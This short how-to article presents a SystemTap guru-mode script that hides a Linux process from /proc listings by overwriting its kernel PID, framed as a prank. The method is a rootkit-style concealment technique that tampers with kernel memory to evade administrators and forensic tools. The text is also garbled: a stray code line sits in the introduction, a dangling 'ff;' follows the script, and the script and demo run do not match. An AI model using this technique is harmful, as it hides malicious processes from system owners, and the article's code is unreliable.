How to Hide a Linux Process with a One‑Line SystemTap Script

Linux users often ask how to hide a process; this article presents a minimal user‑space method that works by changing the process's PID to an unused value. target->pid = 0x7fffffff; Complete SystemTap script (hide.stp):

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
{
    struct task_struct *target;
    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    target->pid = 0x7fffffff;
}

probe begin
{
    pid = $1
    hide(pid);
    exit();
}
ff;

Run a dummy program and the script to see the effect:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

Detect all visible processes by scanning the /proc filesystem:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do
    ls -l /proc/$pid/exe;
 done

When a task is created, its PID is used to register a procfs entry; procfs displays entries by traversing the task list using the PID as a key. Assigning a PID such as 0x7fffffff, which has never been registered, prevents any procfs entry from being created, so the process no longer appears in listings.

Task creation registers a procfs directory based on its PID.

procfs displays directories by iterating over the task list and using the PID as the lookup key.

An unused PID (e.g., 0x7fffffff) has no associated procfs entry, making the process invisible.

The technique is a lightweight prank for advanced engineers and is not intended for serious anti‑forensic or defensive measures.